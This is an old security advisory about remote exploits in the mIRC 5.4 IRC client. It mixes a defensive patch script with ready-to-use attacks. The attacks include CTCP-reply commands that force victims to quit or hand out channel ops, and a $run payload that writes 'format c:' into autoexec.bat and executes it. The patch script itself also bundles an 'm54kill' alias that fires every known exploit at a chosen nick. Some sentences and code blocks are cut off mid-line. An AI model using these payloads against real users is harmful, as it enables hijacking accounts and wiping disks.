

    Systems running mIRC and IRCN


    Number of vulnerabilities has been   found in IRC clients.   Using
    the  command  /ctcpreply,  any  user  can  make  someone using the
    backdoored versions do whatever they want.  For example:

        /ctcpreply (nickname) ping $quit(i,am,owned)
        /ctcpreply Dianora ping $mode(#us-opers,+o,hax0r)


        *** ^DaWg^ ( Quit (owned by you)

    Latest will will force Dianora to give ops to hax0r in  #us-opers.
    For you unix users telnet to the irc server on port 6667 and type:

        user bleh bleh bleh bleh bleh
        nick asdfksdjflk (this will be your nick.. Get creative)

    then type:

        notice (nick) (press ctrl + a) ping $quit(i,am,owned)(press ctrl + a)

    and KABOOM!  There are a lot of nice little things you can do with
    this bug. They can be forced to run arbitrary programs:

        /ctcpreturn (nick) $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
        /ctcpreturn (nick) $run(c:\autoexec.bat)

    Any mIRC script  that makes use  of the event  "ON CTCPREPLY PING"
    which does a  $calc or any  other remote/event that  uses $calc is


    The author of  mIRC has released  v5.41 to address  these security
    holes and various other bugs in  the 5.4 release. It can be  found

    Most people are  only patching themselves  against the $calc  bug,
    but  are  still  wondering  why  their  mIRC keeps crashing..  Its
    because  they  have  not  patched  themselves  against the 2 other
    remote mIRC  exploits.   Below is  the patch  for ALL known remote
    mIRC exploits.  to install it type "/load -rs m54-fix-sploits.mrc"
    (Thanks to myn@efnet).

    ;mIRC 5.4 QuickFIX and Exploits
    ;myn@efnet - 07/22/98

    ;Here is the Quick Fix for all know mIRC 5.4 Exploits to date (07/22/98)

    ;DCC exploit fix
    ctcp *:DCC SEND: { if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }
    ctcp *:DCC RESUME: { if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }

    ;ctcpreply ping $asctime crash and $identifier Exploit fix
    ;replace all instances of the event "on ctcpreply" with the one below

    on 1:CTCPREPLY:PING* {
      if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt }
      if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick   | halt }
      echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s)

    ;And as an added bonus for all you DALnet kiddies
    ;This sends all known mIRC 5.4 exploits at once
    alias m54kill {
      if ($1) {
        .ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie)
        %ip = $rand(600000000,4294967294)
        .quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
        .ctcpreply $1 ping $!asctime(2147483647)
        echo -a * Sent mIRC kills to $1
      echo -a * Parms [/m54kill nick/#channel]